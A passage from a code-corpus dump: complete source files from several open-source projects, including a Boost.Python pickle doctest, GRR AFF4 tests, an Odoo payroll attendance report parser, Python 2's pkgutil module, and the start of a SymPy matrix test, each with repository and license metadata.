| apache-2.0 | 3,467,253,521,211,049,000 | 35.535452 | 100 | 0.667938 | false |
dandan94/OpenGLTest | finalOpenGL/HelloGLFW/lib/boost_1_59_0/libs/python/test/pickle1.py | 46 | 1189 | # Copyright David Abrahams 2004. Distributed under the Boost
# Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
r'''>>> import pickle1_ext
>>> import pickle
>>> pickle1_ext.world.__module__
'pickle1_ext'
>>> pickle1_ext.world.__safe_for_unpickling__
1
>>> pickle1_ext.world.__name__
'world'
>>> pickle1_ext.world('Hello').__reduce__()
(<class 'pickle1_ext.world'>, ('Hello',))
>>> wd = pickle1_ext.world('California')
>>> pstr = pickle.dumps(wd)
>>> wl = pickle.loads(pstr)
>>> print wd.greet()
Hello from California!
>>> print wl.greet()
Hello from California!
>>> noop = pickle1_ext.noop()
>>> try: pickle.dumps(noop)
... except RuntimeError, e: print str(e)[:55]
Pickling of "pickle1_ext.noop" instances is not enabled
'''
def run(args = None):
import sys
import doctest
if args is not None:
sys.argv = args
return doctest.testmod(sys.modules.get(__name__))
if __name__ == '__main__':
print "running..."
import sys
status = run()[0]
if (status == 0): print "Done."
sys.exit(status)
| gpl-3.0 | -5,396,050,070,502,541,000 | 28 | 71 | 0.599664 | false |
ahojjati/grr | lib/aff4_objects/aff4_grr_test.py | 6 | 9733 | #!/usr/bin/env python
# Copyright 2011 Google Inc. All Rights Reserved.
"""Test the grr aff4 objects."""
import time
from grr.lib import aff4
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib import utils
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import paths as rdf_paths
class MockChangeEvent(flow.EventListener):
EVENTS = ["MockChangeEvent"]
well_known_session_id = rdfvalue.SessionID(
flow_name="MockChangeEventHandler")
CHANGED_URNS = []
@flow.EventHandler(allow_client_access=True)
def ProcessMessage(self, message=None, event=None):
_ = event
if (message.auth_state !=
rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED):
return
urn = rdfvalue.RDFURN(message.payload)
MockChangeEvent.CHANGED_URNS.append(urn)
class AFF4GRRTest(test_lib.AFF4ObjectTest):
"""Test the client aff4 implementation."""
def setUp(self):
super(AFF4GRRTest, self).setUp()
MockChangeEvent.CHANGED_URNS = []
def testPathspecToURN(self):
"""Test the pathspec to URN conversion function."""
pathspec = rdf_paths.PathSpec(
path="\\\\.\\Volume{1234}\\", pathtype=rdf_paths.PathSpec.PathType.OS,
mount_point="/c:/").Append(
path="/windows",
pathtype=rdf_paths.PathSpec.PathType.TSK)
urn = aff4.AFF4Object.VFSGRRClient.PathspecToURN(
pathspec, "C.1234567812345678")
self.assertEqual(
urn, rdfvalue.RDFURN(
r"aff4:/C.1234567812345678/fs/tsk/\\.\Volume{1234}\/windows"))
# Test an ADS
pathspec = rdf_paths.PathSpec(
path="\\\\.\\Volume{1234}\\", pathtype=rdf_paths.PathSpec.PathType.OS,
mount_point="/c:/").Append(
pathtype=rdf_paths.PathSpec.PathType.TSK,
path="/Test Directory/notes.txt:ads",
inode=66,
ntfs_type=128,
ntfs_id=2)
urn = aff4.AFF4Object.VFSGRRClient.PathspecToURN(
pathspec, "C.1234567812345678")
self.assertEqual(
urn, rdfvalue.RDFURN(
r"aff4:/C.1234567812345678/fs/tsk/\\.\Volume{1234}\/"
"Test Directory/notes.txt:ads"))
def testClientSubfieldGet(self):
"""Test we can get subfields of the client."""
fd = aff4.FACTORY.Create("C.0000000000000000", "VFSGRRClient",
token=self.token, age=aff4.ALL_TIMES)
users = fd.Schema.USER()
for i in range(5):
folder = "C:/Users/user%s" % i
user = rdf_client.User(username="user%s" % i)
user.special_folders.app_data = folder
users.Append(user)
fd.AddAttribute(users)
fd.Close()
# Check the repeated Users array.
for i, folder in enumerate(
fd.GetValuesForAttribute("Users.special_folders.app_data")):
self.assertEqual(folder, "C:/Users/user%s" % i)
def testRegexChangeNotification(self):
"""Test the AFF4RegexNotificationRule rule."""
client_name = "C." + "0" * 16
# Create the notification rule.
rule_fd = aff4.FACTORY.Create("aff4:/config/aff4_rules/new_rule",
aff4_type="AFF4RegexNotificationRule",
token=self.token)
rule_fd.Set(rule_fd.Schema.CLIENT_PATH_REGEX("b.*"))
rule_fd.Set(rule_fd.Schema.EVENT_NAME("MockChangeEvent"))
rule_fd.Set(rule_fd.Schema.NOTIFY_ONLY_IF_NEW(0))
rule_fd.Close()
# Force notification rules to be reloaded.
aff4.FACTORY.UpdateNotificationRules()
fd = aff4.FACTORY.Create(rdf_client.ClientURN(client_name).Add("a"),
token=self.token,
aff4_type="AFF4Object")
fd.Close()
worker_mock = test_lib.MockWorker(token=self.token)
while worker_mock.Next():
pass
# No notifications are expected, because path doesn't match the regex
self.assertEqual(len(MockChangeEvent.CHANGED_URNS), 0)
fd = aff4.FACTORY.Create(rdf_client.ClientURN(client_name).Add("b"),
token=self.token,
aff4_type="AFF4Object")
fd.Close()
while worker_mock.Next():
pass
# Now we get a notification, because the path matches
self.assertEqual(len(MockChangeEvent.CHANGED_URNS), 1)
self.assertEqual(MockChangeEvent.CHANGED_URNS[0],
rdf_client.ClientURN(client_name).Add("b"))
MockChangeEvent.CHANGED_URNS = []
# Write again to the same file and check that there's notification again
fd = aff4.FACTORY.Create(rdf_client.ClientURN(client_name).Add("b"),
token=self.token,
aff4_type="AFF4Object")
fd.Close()
while worker_mock.Next():
pass
self.assertEqual(len(MockChangeEvent.CHANGED_URNS), 1)
self.assertEqual(MockChangeEvent.CHANGED_URNS[0],
rdf_client.ClientURN(client_name).Add("b"))
MockChangeEvent.CHANGED_URNS = []
# Change the rule to notify only if file is written for the first time
rule_fd = aff4.FACTORY.Open("aff4:/config/aff4_rules/new_rule",
mode="rw",
token=self.token)
rule_fd.Set(rule_fd.Schema.NOTIFY_ONLY_IF_NEW, rdfvalue.RDFInteger(1))
rule_fd.Close()
# Force update of the rules in the factory
aff4.FACTORY.UpdateNotificationRules()
# Check that we don't get a notification for overwriting existing file
fd = aff4.FACTORY.Create(rdf_client.ClientURN(client_name).Add("b"),
token=self.token,
aff4_type="AFF4Object")
fd.Close()
while worker_mock.Next():
pass
self.assertEqual(len(MockChangeEvent.CHANGED_URNS), 0)
# Check that we do get a notification for writing a new file
fd = aff4.FACTORY.Create(rdf_client.ClientURN(client_name).Add("b2"),
token=self.token,
aff4_type="AFF4Object")
fd.Close()
while worker_mock.Next():
pass
self.assertEqual(len(MockChangeEvent.CHANGED_URNS), 1)
self.assertEqual(MockChangeEvent.CHANGED_URNS[0],
rdf_client.ClientURN(client_name).Add("b2"))
def testVFSFileContentLastNotUpdated(self):
"""Make sure CONTENT_LAST does not update when only STAT is written.."""
path = "/C.12345/contentlastchecker"
timestamp = 1
with utils.Stubber(time, "time", lambda: timestamp):
fd = aff4.FACTORY.Create(path, "VFSFile", mode="w", token=self.token)
timestamp += 1
fd.SetChunksize(10)
# Make lots of small writes - The length of this string and the chunk size
# are relative primes for worst case.
for i in range(100):
fd.Write("%s%08X\n" % ("Test", i))
# Flush after every write.
fd.Flush()
# And advance the time.
timestamp += 1
fd.Set(fd.Schema.STAT, rdf_client.StatEntry())
fd.Close()
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
# Make sure the attribute was written when the write occured.
self.assertEqual(int(fd.GetContentAge()), 101000000)
# Write the stat (to be the same as before, but this still counts
# as a write).
fd.Set(fd.Schema.STAT, fd.Get(fd.Schema.STAT))
fd.Flush()
fd = aff4.FACTORY.Open(path, token=self.token)
# The age of the content should still be the same.
self.assertEqual(int(fd.GetContentAge()), 101000000)
def testGetClientSummary(self):
hostname = "test"
system = "Linux"
os_release = "12.02"
kernel = "3.15-rc2"
fqdn = "test.test.com"
arch = "amd64"
install_time = rdfvalue.RDFDatetime().Now()
user = "testuser"
userobj = rdf_client.User(username=user)
interface = rdf_client.Interface(ifname="eth0")
timestamp = 1
with utils.Stubber(time, "time", lambda: timestamp):
with aff4.FACTORY.Create("C.0000000000000000", "VFSGRRClient", mode="rw",
token=self.token) as fd:
empty_summary = fd.GetSummary()
self.assertEqual(empty_summary.client_id, "C.0000000000000000")
self.assertFalse(empty_summary.system_info.version)
self.assertEqual(empty_summary.timestamp.AsSecondsFromEpoch(), 1)
# This will cause TYPE to be written with current time = 101 when the
# object is closed
timestamp += 100
fd.Set(fd.Schema.HOSTNAME(hostname))
fd.Set(fd.Schema.SYSTEM(system))
fd.Set(fd.Schema.OS_RELEASE(os_release))
fd.Set(fd.Schema.KERNEL(kernel))
fd.Set(fd.Schema.FQDN(fqdn))
fd.Set(fd.Schema.ARCH(arch))
fd.Set(fd.Schema.INSTALL_DATE(install_time))
fd.Set(fd.Schema.USER([userobj]))
fd.Set(fd.Schema.USERNAMES([user]))
fd.Set(fd.Schema.LAST_INTERFACES([interface]))
with aff4.FACTORY.Open("C.0000000000000000", "VFSGRRClient", mode="rw",
token=self.token) as fd:
summary = fd.GetSummary()
self.assertEqual(summary.system_info.node, hostname)
self.assertEqual(summary.system_info.system, system)
self.assertEqual(summary.system_info.release, os_release)
self.assertEqual(summary.system_info.kernel, kernel)
self.assertEqual(summary.system_info.fqdn, fqdn)
self.assertEqual(summary.system_info.machine, arch)
self.assertEqual(summary.system_info.install_date, install_time)
self.assertItemsEqual(summary.users, [userobj])
self.assertItemsEqual(summary.interfaces, [interface])
self.assertFalse(summary.client_info)
self.assertEqual(summary.timestamp.AsSecondsFromEpoch(), 101)
| apache-2.0 | 2,688,559,501,686,791,000 | 34.137184 | 80 | 0.634029 | false |
abstract-open-solutions/hr | __unported__/hr_report_payroll_attendance_summary/report/attendance_summary.py | 21 | 9460 | # -*- coding:utf-8 -*-
#
#
# Copyright (C) 2013 Michael Telahun Makonnen <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from datetime import datetime
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as OE_DATEFORMAT
from report import report_sxw
class Parser(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(Parser, self).__init__(cr, uid, name, context)
self.localcontext.update({
'get_employee_data': self.get_employee_data,
'get_worked_days': self.get_worked_days,
'get_daily_ot': self.get_daily_ot,
'get_nightly_ot': self.get_nightly_ot,
'get_restday_ot': self.get_restday_ot,
'get_holiday_ot': self.get_holiday_ot,
'get_bunch_no': self.get_bunch_no,
'get_awol': self.get_awol,
'get_sickleave': self.get_sickleave,
'get_no': self.get_no,
'get_start': self.get_start,
'get_end': self.get_end,
'lose_bonus': self.lose_bonus,
'get_paid_leave': self.get_paid_leave,
'get_employee_list': self.get_employee_list,
})
self.start_date = False
self.end_date = False
self.ee_lines = {}
self.no = 0
self.department_id = False
self.regular_hours = 8.0
def set_context(self, objects, data, ids, report_type=None):
if data.get('form', False) and data['form'].get('start_date', False):
self.start_date = data['form']['start_date']
if data.get('form', False) and data['form'].get('end_date', False):
self.end_date = data['form']['end_date']
return super(Parser, self).set_context(
objects, data, ids, report_type=report_type)
def get_employee_list(self, department_id):
ee_obj = self.pool.get('hr.employee')
ee_ids = ee_obj.search(
self.cr, self.uid, [
('active', '=', True),
'|',
('department_id.id', '=', department_id),
('saved_department_id.id', '=', department_id)
])
ees = ee_obj.browse(self.cr, self.uid, ee_ids)
return ees
def get_employee_data(self, department_id):
payslip_obj = self.pool.get('hr.payslip')
ee_obj = self.pool.get('hr.employee')
dtStart = datetime.strptime(self.start_date, OE_DATEFORMAT).date()
dtEnd = datetime.strptime(self.end_date, OE_DATEFORMAT).date()
ee_ids = ee_obj.search(
self.cr, self.uid, [
('active', '=', True),
'|',
('department_id.id', '=', department_id),
('saved_department_id.id', '=', department_id)
])
for ee in ee_obj.browse(self.cr, self.uid, ee_ids):
datas = []
for c in ee.contract_ids:
dtCStart = False
dtCEnd = False
if c.date_start:
dtCStart = datetime.strptime(
c.date_start, OE_DATEFORMAT).date()
if c.date_end:
dtCEnd = datetime.strptime(
c.date_end, OE_DATEFORMAT).date()
if (dtCStart and dtCStart <= dtEnd) and (
(dtCEnd and dtCEnd >= dtStart) or not dtCEnd
):
datas.append({
'contract_id': c.id,
'date_start': (dtCStart > dtStart
and dtCStart.strftime(OE_DATEFORMAT)
or dtStart.strftime(OE_DATEFORMAT)),
'date_end': ((dtCEnd and dtCEnd < dtEnd)
and dtCEnd.strftime(OE_DATEFORMAT)
or dtEnd.strftime(OE_DATEFORMAT)),
})
wd_lines = []
for d in datas:
wd_lines += payslip_obj.get_worked_day_lines(
self.cr, self.uid, [d['contract_id']],
d['date_start'], d['date_end'])
self.ee_lines.update({ee.id: wd_lines})
def get_start(self):
return datetime.strptime(self.start_date, OE_DATEFORMAT).strftime(
'%B %d, %Y')
def get_end(self):
return datetime.strptime(self.end_date, OE_DATEFORMAT).strftime(
'%B %d, %Y')
def get_no(self, department_id):
if not self.department_id or self.department_id != department_id:
self.department_id = department_id
self.no = 1
else:
self.no += 1
return self.no
def get_employee_start_date(self, employee_id):
first_day = False
c_obj = self.pool.get('hr.contract')
c_ids = c_obj.search(
self.cr, self.uid, [('employee_id', '=', employee_id)])
for contract in c_obj.browse(self.cr, self.uid, c_ids):
if not first_day or contract.date_start < first_day:
first_day = contract.date_start
return first_day
def get_worked_days(self, employee_id):
total = 0.0
maxw = 0.0
for line in self.ee_lines[employee_id]:
if line['code'] in ['WORK100']:
total += float(line['number_of_hours']) / self.regular_hours
elif line['code'] == ['MAX']:
maxw += float(line['number_of_hours']) / self.regular_hours
total += self.get_paid_leave(employee_id)
awol = self.get_awol(employee_id)
# Take care to identify and handle employee's who didn't work the
# full month: newly hired and terminated employees
#
hire_date = self.get_employee_start_date(employee_id)
term_ids = self.pool.get(
'hr.employee.termination').search(
self.cr, self.uid, [
('name', '<', self.end_date),
('name', '>=', self.start_date),
('employee_id', '=', employee_id),
('employee_id.status', 'in', [
'pending_inactive', 'inactive']),
('state', 'not in', ['cancel'])])
if hire_date <= self.start_date and len(term_ids) == 0:
if total >= maxw:
total = 26
total = total - awol
return total
def get_paid_leave(self, employee_id):
total = 0
paid_leaves = ['LVANNUAL', 'LVBEREAVEMENT', 'LVCIVIC', 'LVMATERNITY',
'LVMMEDICAL', 'LVPTO', 'LVWEDDING', 'LVSICK']
for line in self.ee_lines[employee_id]:
if line['code'] in paid_leaves:
total += float(line['number_of_hours']) / self.regular_hours
return total
def get_daily_ot(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['WORKOTD']:
total += line['number_of_hours']
return total
def get_nightly_ot(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['WORKOTN']:
total += line['number_of_hours']
return total
def get_restday_ot(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['WORKOTR']:
total += line['number_of_hours']
return total
def get_holiday_ot(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['WORKOTH']:
total += line['number_of_hours']
return total
def get_bunch_no(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['BUNCH']:
total += int(line['number_of_hours'])
return total
def get_awol(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['AWOL']:
total += float(line['number_of_hours']) / self.regular_hours
return total
def get_sickleave(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['LVSICK']:
total += float(line['number_of_hours']) / self.regular_hours
elif line['code'] in ['LVSICK50']:
total += float(line['number_of_hours']) * 0.5
return total
def lose_bonus(self, employee_id):
loseit = False
for line in self.ee_lines[employee_id]:
if line['code'] in ['AWOL', 'TARDY', 'NFRA', 'WARN'] and line[
'number_of_hours'
] > 0.01:
loseit = True
return loseit
| agpl-3.0 | 4,764,162,334,123,626,000 | 35.384615 | 77 | 0.526216 | false |
codepython/restcommander | play-1.2.4/python/Lib/pkgutil.py | 66 | 20001 | """Utilities to support packages."""
# NOTE: This module must remain compatible with Python 2.3, as it is shared
# by setuptools for distribution with Python 2.3 and up.
import os
import sys
import imp
import os.path
from types import ModuleType
__all__ = [
'get_importer', 'iter_importers', 'get_loader', 'find_loader',
'walk_packages', 'iter_modules',
'ImpImporter', 'ImpLoader', 'read_code', 'extend_path',
]
def read_code(stream):
# This helper is needed in order for the PEP 302 emulation to
# correctly handle compiled files
import marshal
magic = stream.read(4)
if magic != imp.get_magic():
return None
stream.read(4) # Skip timestamp
return marshal.load(stream)
def simplegeneric(func):
"""Make a trivial single-dispatch generic function"""
registry = {}
def wrapper(*args, **kw):
ob = args[0]
try:
cls = ob.__class__
except AttributeError:
cls = type(ob)
try:
mro = cls.__mro__
except AttributeError:
try:
class cls(cls, object):
pass
mro = cls.__mro__[1:]
except TypeError:
mro = object, # must be an ExtensionClass or some such :(
for t in mro:
if t in registry:
return registry[t](*args, **kw)
else:
return func(*args, **kw)
try:
wrapper.__name__ = func.__name__
except (TypeError, AttributeError):
pass # Python 2.3 doesn't allow functions to be renamed
def register(typ, func=None):
if func is None:
return lambda f: register(typ, f)
registry[typ] = func
return func
wrapper.__dict__ = func.__dict__
wrapper.__doc__ = func.__doc__
wrapper.register = register
return wrapper
def walk_packages(path=None, prefix='', onerror=None):
"""Yields (module_loader, name, ispkg) for all modules recursively
on path, or, if path is None, all accessible modules.
'path' should be either None or a list of paths to look for
modules in.
'prefix' is a string to output on the front of every module name
on output.
Note that this function must import all *packages* (NOT all
modules!) on the given path, in order to access the __path__
attribute to find submodules.
'onerror' is a function which gets called with one argument (the
name of the package which was being imported) if any exception
occurs while trying to import a package. If no onerror function is
supplied, ImportErrors are caught and ignored, while all other
exceptions are propagated, terminating the search.
Examples:
# list all modules python can access
walk_packages()
# list all submodules of ctypes
walk_packages(ctypes.__path__, ctypes.__name__+'.')
"""
def seen(p, m={}):
if p in m:
return True
m[p] = True
for importer, name, ispkg in iter_modules(path, prefix):
yield importer, name, ispkg
if ispkg:
try:
__import__(name)
except ImportError:
if onerror is not None:
onerror(name)
except Exception:
if onerror is not None:
onerror(name)
else:
raise
else:
path = getattr(sys.modules[name], '__path__', None) or []
# don't traverse path items we've seen before
path = [p for p in path if not seen(p)]
for item in walk_packages(path, name+'.', onerror):
yield item
def iter_modules(path=None, prefix=''):
"""Yields (module_loader, name, ispkg) for all submodules on path,
or, if path is None, all top-level modules on sys.path.
'path' should be either None or a list of paths to look for
modules in.
'prefix' is a string to output on the front of every module name
on output.
"""
if path is None:
importers = iter_importers()
else:
importers = map(get_importer, path)
yielded = {}
for i in importers:
for name, ispkg in iter_importer_modules(i, prefix):
if name not in yielded:
yielded[name] = 1
yield i, name, ispkg
#@simplegeneric
def iter_importer_modules(importer, prefix=''):
if not hasattr(importer, 'iter_modules'):
return []
return importer.iter_modules(prefix)
iter_importer_modules = simplegeneric(iter_importer_modules)
class ImpImporter:
"""PEP 302 Importer that wraps Python's "classic" import algorithm
ImpImporter(dirname) produces a PEP 302 importer that searches that
directory. ImpImporter(None) produces a PEP 302 importer that searches
the current sys.path, plus any modules that are frozen or built-in.
Note that ImpImporter does not currently support being used by placement
on sys.meta_path.
"""
def __init__(self, path=None):
self.path = path
def find_module(self, fullname, path=None):
# Note: we ignore 'path' argument since it is only used via meta_path
subname = fullname.split(".")[-1]
if subname != fullname and self.path is None:
return None
if self.path is None:
path = None
else:
path = [os.path.realpath(self.path)]
try:
file, filename, etc = imp.find_module(subname, path)
except ImportError:
return None
return ImpLoader(fullname, file, filename, etc)
def iter_modules(self, prefix=''):
if self.path is None or not os.path.isdir(self.path):
return
yielded = {}
import inspect
filenames = os.listdir(self.path)
filenames.sort() # handle packages before same-named modules
for fn in filenames:
modname = inspect.getmodulename(fn)
if modname=='__init__' or modname in yielded:
continue
path = os.path.join(self.path, fn)
ispkg = False
if not modname and os.path.isdir(path) and '.' not in fn:
modname = fn
for fn in os.listdir(path):
subname = inspect.getmodulename(fn)
if subname=='__init__':
ispkg = True
break
else:
continue # not a package
if modname and '.' not in modname:
yielded[modname] = 1
yield prefix + modname, ispkg
class ImpLoader:
"""PEP 302 Loader that wraps Python's "classic" import algorithm
"""
code = source = None
def __init__(self, fullname, file, filename, etc):
self.file = file
self.filename = filename
self.fullname = fullname
self.etc = etc
def load_module(self, fullname):
self._reopen()
try:
mod = imp.load_module(fullname, self.file, self.filename, self.etc)
finally:
if self.file:
self.file.close()
# Note: we don't set __loader__ because we want the module to look
# normal; i.e. this is just a wrapper for standard import machinery
return mod
def get_data(self, pathname):
return open(pathname, "rb").read()
def _reopen(self):
if self.file and self.file.closed:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
self.file = open(self.filename, 'rU')
elif mod_type in (imp.PY_COMPILED, imp.C_EXTENSION):
self.file = open(self.filename, 'rb')
def _fix_name(self, fullname):
if fullname is None:
fullname = self.fullname
elif fullname != self.fullname:
raise ImportError("Loader for module %s cannot handle "
"module %s" % (self.fullname, fullname))
return fullname
def is_package(self, fullname):
fullname = self._fix_name(fullname)
return self.etc[2]==imp.PKG_DIRECTORY
def get_code(self, fullname=None):
fullname = self._fix_name(fullname)
if self.code is None:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
source = self.get_source(fullname)
self.code = compile(source, self.filename, 'exec')
elif mod_type==imp.PY_COMPILED:
self._reopen()
try:
self.code = read_code(self.file)
finally:
self.file.close()
elif mod_type==imp.PKG_DIRECTORY:
self.code = self._get_delegate().get_code()
return self.code
def get_source(self, fullname=None):
fullname = self._fix_name(fullname)
if self.source is None:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
self._reopen()
try:
self.source = self.file.read()
finally:
self.file.close()
elif mod_type==imp.PY_COMPILED:
if os.path.exists(self.filename[:-1]):
f = open(self.filename[:-1], 'rU')
self.source = f.read()
f.close()
elif mod_type==imp.PKG_DIRECTORY:
self.source = self._get_delegate().get_source()
return self.source
def _get_delegate(self):
return ImpImporter(self.filename).find_module('__init__')
def get_filename(self, fullname=None):
fullname = self._fix_name(fullname)
mod_type = self.etc[2]
if self.etc[2]==imp.PKG_DIRECTORY:
return self._get_delegate().get_filename()
elif self.etc[2] in (imp.PY_SOURCE, imp.PY_COMPILED, imp.C_EXTENSION):
return self.filename
return None
try:
import zipimport
from zipimport import zipimporter
def iter_zipimport_modules(importer, prefix=''):
dirlist = zipimport._zip_directory_cache[importer.archive].keys()
dirlist.sort()
_prefix = importer.prefix
plen = len(_prefix)
yielded = {}
import inspect
for fn in dirlist:
if not fn.startswith(_prefix):
continue
fn = fn[plen:].split(os.sep)
if len(fn)==2 and fn[1].startswith('__init__.py'):
if fn[0] not in yielded:
yielded[fn[0]] = 1
yield fn[0], True
if len(fn)!=1:
continue
modname = inspect.getmodulename(fn[0])
if modname=='__init__':
continue
if modname and '.' not in modname and modname not in yielded:
yielded[modname] = 1
yield prefix + modname, False
iter_importer_modules.register(zipimporter, iter_zipimport_modules)
except ImportError:
pass
def get_importer(path_item):
"""Retrieve a PEP 302 importer for the given path item
The returned importer is cached in sys.path_importer_cache
if it was newly created by a path hook.
If there is no importer, a wrapper around the basic import
machinery is returned. This wrapper is never inserted into
the importer cache (None is inserted instead).
The cache (or part of it) can be cleared manually if a
rescan of sys.path_hooks is necessary.
"""
try:
importer = sys.path_importer_cache[path_item]
except KeyError:
for path_hook in sys.path_hooks:
try:
importer = path_hook(path_item)
break
except ImportError:
pass
else:
importer = None
sys.path_importer_cache.setdefault(path_item, importer)
if importer is None:
try:
importer = ImpImporter(path_item)
except ImportError:
importer = None
return importer
def iter_importers(fullname=""):
"""Yield PEP 302 importers for the given module name
If fullname contains a '.', the importers will be for the package
containing fullname, otherwise they will be importers for sys.meta_path,
sys.path, and Python's "classic" import machinery, in that order. If
the named module is in a package, that package is imported as a side
effect of invoking this function.
Non PEP 302 mechanisms (e.g. the Windows registry) used by the
standard import machinery to find files in alternative locations
are partially supported, but are searched AFTER sys.path. Normally,
these locations are searched BEFORE sys.path, preventing sys.path
entries from shadowing them.
For this to cause a visible difference in behaviour, there must
be a module or package name that is accessible via both sys.path
and one of the non PEP 302 file system mechanisms. In this case,
the emulation will find the former version, while the builtin
import mechanism will find the latter.
Items of the following types can be affected by this discrepancy:
imp.C_EXTENSION, imp.PY_SOURCE, imp.PY_COMPILED, imp.PKG_DIRECTORY
"""
if fullname.startswith('.'):
raise ImportError("Relative module names not supported")
if '.' in fullname:
# Get the containing package's __path__
pkg = '.'.join(fullname.split('.')[:-1])
if pkg not in sys.modules:
__import__(pkg)
path = getattr(sys.modules[pkg], '__path__', None) or []
else:
for importer in sys.meta_path:
yield importer
path = sys.path
for item in path:
yield get_importer(item)
if '.' not in fullname:
yield ImpImporter()
def get_loader(module_or_name):
"""Get a PEP 302 "loader" object for module_or_name
If the module or package is accessible via the normal import
mechanism, a wrapper around the relevant part of that machinery
is returned. Returns None if the module cannot be found or imported.
If the named module is not already imported, its containing package
(if any) is imported, in order to establish the package __path__.
This function uses iter_importers(), and is thus subject to the same
limitations regarding platform-specific special import locations such
as the Windows registry.
"""
if module_or_name in sys.modules:
module_or_name = sys.modules[module_or_name]
if isinstance(module_or_name, ModuleType):
module = module_or_name
loader = getattr(module, '__loader__', None)
if loader is not None:
return loader
fullname = module.__name__
else:
fullname = module_or_name
return find_loader(fullname)
def find_loader(fullname):
"""Find a PEP 302 "loader" object for fullname
If fullname contains dots, path must be the containing package's __path__.
Returns None if the module cannot be found or imported. This function uses
iter_importers(), and is thus subject to the same limitations regarding
platform-specific special import locations such as the Windows registry.
"""
for importer in iter_importers(fullname):
loader = importer.find_module(fullname)
if loader is not None:
return loader
return None
def extend_path(path, name):
"""Extend a package's path.
Intended use is to place the following code in a package's __init__.py:
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)
This will add to the package's __path__ all subdirectories of
directories on sys.path named after the package. This is useful
if one wants to distribute different parts of a single logical
package as multiple directories.
It also looks for *.pkg files beginning where * matches the name
argument. This feature is similar to *.pth files (see site.py),
except that it doesn't special-case lines starting with 'import'.
A *.pkg file is trusted at face value: apart from checking for
duplicates, all entries found in a *.pkg file are added to the
path, regardless of whether they are exist the filesystem. (This
is a feature.)
If the input path is not a list (as is the case for frozen
packages) it is returned unchanged. The input path is not
modified; an extended copy is returned. Items are only appended
to the copy at the end.
It is assumed that sys.path is a sequence. Items of sys.path that
are not (unicode or 8-bit) strings referring to existing
directories are ignored. Unicode items of sys.path that cause
errors when used as filenames may cause this function to raise an
exception (in line with os.path.isdir() behavior).
"""
if not isinstance(path, list):
# This could happen e.g. when this is called from inside a
# frozen package. Return the path unchanged in that case.
return path
pname = os.path.join(*name.split('.')) # Reconstitute as relative path
# Just in case os.extsep != '.'
sname = os.extsep.join(name.split('.'))
sname_pkg = sname + os.extsep + "pkg"
init_py = "__init__" + os.extsep + "py"
path = path[:] # Start with a copy of the existing path
for dir in sys.path:
if not isinstance(dir, basestring) or not os.path.isdir(dir):
continue
subdir = os.path.join(dir, pname)
# XXX This may still add duplicate entries to path on
# case-insensitive filesystems
initfile = os.path.join(subdir, init_py)
if subdir not in path and os.path.isfile(initfile):
path.append(subdir)
# XXX Is this the right thing for subpackages like zope.app?
# It looks for a file named "zope.app.pkg"
pkgfile = os.path.join(dir, sname_pkg)
if os.path.isfile(pkgfile):
try:
f = open(pkgfile)
except IOError, msg:
sys.stderr.write("Can't open %s: %s\n" %
(pkgfile, msg))
else:
for line in f:
line = line.rstrip('\n')
if not line or line.startswith('#'):
continue
path.append(line) # Don't check for existence!
f.close()
return path
def get_data(package, resource):
"""Get a resource from a package.
This is a wrapper round the PEP 302 loader get_data API. The package
argument should be the name of a package, in standard module format
(foo.bar). The resource argument should be in the form of a relative
filename, using '/' as the path separator. The parent directory name '..'
is not allowed, and nor is a rooted name (starting with a '/').
The function returns a binary string, which is the contents of the
specified resource.
For packages located in the filesystem, which have already been imported,
this is the rough equivalent of
d = os.path.dirname(sys.modules[package].__file__)
data = open(os.path.join(d, resource), 'rb').read()
If the package cannot be located or loaded, or it uses a PEP 302 loader
which does not support get_data(), then None is returned.
"""
loader = get_loader(package)
if loader is None or not hasattr(loader, 'get_data'):
return None
mod = sys.modules.get(package) or loader.load_module(package)
if mod is None or not hasattr(mod, '__file__'):
return None
# Modify the resource name to be compatible with the loader.get_data
# signature - an os.path format "filename" starting with the dirname of
# the package's __file__
parts = resource.split('/')
parts.insert(0, os.path.dirname(mod.__file__))
resource_name = os.path.join(*parts)
return loader.get_data(resource_name)
| apache-2.0 | -8,815,676,701,688,771,000 | 33.307033 | 79 | 0.60102 | false |
debugger22/sympy | sympy/matrices/tests/test_interactions.py | 58 | 1881 | """
We have a few different kind of Matrices
Matrix, ImmutableMatrix, MatrixExpr
Here we test the extent to which they cooperate
"""
from sympy import symbols
from sympy.matrices import (Matrix, MatrixSymbol, eye, Identity,
ImmutableMatrix)
from sympy.core.compatibility import range
from sympy.matrices.expressions import MatrixExpr, MatAdd
from sympy.matrices.matrices import classof
from sympy.utilities.pytest import raises
SM = MatrixSymbol('X', 3, 3)
MM = Matrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
IM = ImmutableMatrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
meye = eye(3)
imeye = ImmutableMatrix(eye(3))
ideye = Identity(3)
a, b, c = symbols('a,b,c')
def test_IM_MM():
